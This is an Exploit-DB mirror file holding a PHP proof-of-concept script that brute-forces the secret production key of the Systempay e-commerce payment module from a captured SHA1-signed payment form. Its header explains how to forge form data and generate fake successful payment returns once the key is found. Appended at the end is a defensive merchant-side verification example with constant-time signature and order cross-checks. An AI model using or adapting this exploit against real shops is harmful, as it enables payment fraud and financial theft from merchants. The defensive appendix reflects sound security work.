exploit-db-mirror/exploits/php/webapps/48017.php
Offensive Security 923f53211e DB: 2020-02-07
2020-02-07 05:02:01 +00:00

98 lines
No EOL
2.9 KiB
PHP

# Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force
# Author: live3
# Date: 2020-02-05
# Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
# Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/
# Tested on: MacOs
# Version: ALL
<?php
/**
 *
 * INFORMATION
 * Exploit Title: Ecommerce Systempay decode secret production KEY / Brute Force
 * Author: live3
 * Date: 2020-02-05
 * Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/
 * Tested on: MacOs
 * Version: ALL
 * Prerequisite: Find an e-commerce site that uses Systempay with SHA1 for the form signature.
 * Put some products in the cart and choose Systempay as the payment method.
 * Capture all the data POSTed to https://paiement.systempay.fr/vads-payment/
 * Keep the signature as a reference and all the vads fields to recompute the signature.
 * Use this script to brute-force the secret production key (16 characters long).
 *
 * Usage: Once you have the production KEY, any modification of the form data will be accepted by Systempay! (You just generate a new signature for your changes.)
 * You will be able to generate a successful payment return!
 *
 * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
 * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
 *
 */
// Set the start number you want (16 characters long)
$last_key_check = '1000000000000000';
// Assign vars
$array_key = array();
$sentence = '';
$how_many_key_to_check_for_loop = 10;
// Put here the signature extracted from the POST DATA
// Example: SHA1 of the string "test"
$signature_from_post = 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3';
// Copy-paste the decoded content of the POST DATA here, one "field: value" per line
$form_data = '
vads_field_1: VALUE1
vads_field_2: VALUE2
// AND ALL OTHER FIELDS...
';
$array = explode(PHP_EOL, $form_data);
foreach ($array as $data) {
    // Skip blank lines and comment lines such as the placeholder above
    // (the original indexed $elements[1] unconditionally, which warns on them)
    if ($data == '' || strpos(ltrim($data), '//') === 0) {
        continue;
    }
    // Limit to 2 parts so a value that itself contains ': ' is not truncated
    $elements = explode(': ', $data, 2);
    if (count($elements) == 2) {
        $array_key[trim($elements[0])] = rtrim($elements[1], "\r");
    }
}
// Systempay signs the vads_* values in alphabetical order of field name, joined with '+'
ksort($array_key);
foreach ($array_key as $value) {
    $sentence .= $value . '+';
}
echo 'Signature from POST DATA : '.$signature_from_post.'<br/>';
$found = false;
// Track the last candidate tried; starts at the start key so a hit on the
// first check below reports the right key instead of an empty string
$get_key = $last_key_check;
// first check: the start key itself
if (sha1($sentence.$last_key_check) != $signature_from_post) {
    // then the next $how_many_key_to_check_for_loop candidates (needs 64-bit PHP for 16-digit keys)
    for ($i = (int) $last_key_check; $i <= $last_key_check + $how_many_key_to_check_for_loop; $i++) {
        $get_key = $i;
        if (sha1($sentence.$i) == $signature_from_post) {
            echo 'Key found : '.$i.'<br/>';
            $found = true;
            break;
        }
    }
} else {
    $found = true;
}
if ($found) {
    $test_sha = sha1($sentence.$get_key);
    echo 'Signature calc : '.$test_sha.'<br/><hr/>';
} else {
    echo 'Last key check : '.$get_key.'<br/><hr/>';
}
echo 'Your sequence : '.$sentence.'<br/>';
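The defender's counterpart to the PoC, added here as an example that is neither part of the original exploit nor Systempay's own module: a merchant-side check that recomputes the SHA1 signature the script brute-forces, compares it in constant time, and then cross-checks the returned amount, currency and status against the order stored server-side. The `vads_amount`, `vads_currency` and `vads_trans_status` field names, the `$order` record layout and the key placeholder are assumptions.

```php
<?php
// Added example, not part of the PoC: merchant-side verification of a
// Systempay-style payment return. The signature scheme is the one the PoC
// brute-forces: vads_* values sorted by field name, joined with '+', a
// trailing '+', then the merchant key, hashed with SHA-1.

// Placeholder: the real production key is configured in the merchant module.
const MERCHANT_KEY = 'REPLACE_WITH_PRODUCTION_KEY';

function systempayExpectedSignature(array $post, string $key): string
{
    $fields = [];
    foreach ($post as $name => $value) {
        // Only vads_* fields are covered; the signature field itself is not.
        if (strncmp((string) $name, 'vads_', 5) === 0) {
            $fields[$name] = (string) $value;
        }
    }
    ksort($fields, SORT_STRING);
    return sha1(implode('+', $fields) . '+' . $key);
}

function systempayReturnIsValid(array $post, string $key, array $order): bool
{
    // Constant-time comparison instead of the PoC's loose != / ==.
    $expected = systempayExpectedSignature($post, $key);
    if (!isset($post['signature']) || !hash_equals($expected, (string) $post['signature'])) {
        return false;
    }
    // A matching signature only proves the sender knew the key. Since the PoC
    // recovers the key from a captured form, the amount, currency and status
    // must also match the order recorded server-side before it is marked paid.
    // $order is the merchant's own record (its field names are assumptions).
    return ($post['vads_amount'] ?? '') === (string) $order['amount_cents']
        && ($post['vads_currency'] ?? '') === (string) $order['currency']
        && ($post['vads_trans_status'] ?? '') === 'AUTHORISED';
}

// Constructed sample: a return whose signature is valid for the key but whose
// amount (1.00, in cents) does not match the order the merchant stored (25.99).
$sample = [
    'vads_amount'       => '100',
    'vads_currency'     => '978',
    'vads_trans_status' => 'AUTHORISED',
];
$sample['signature'] = systempayExpectedSignature($sample, MERCHANT_KEY);
$order = ['amount_cents' => '2599', 'currency' => '978'];
var_dump(systempayReturnIsValid($sample, MERCHANT_KEY, $order));
```

In the constructed sample the signature verifies but the amount does not match the stored order, so the return is rejected; this stops the cheaper variant of what the PoC describes (altering the amount in the form), while a success return for a payment that never happened still needs a server-to-server confirmation from the payment platform rather than trust in the browser redirect.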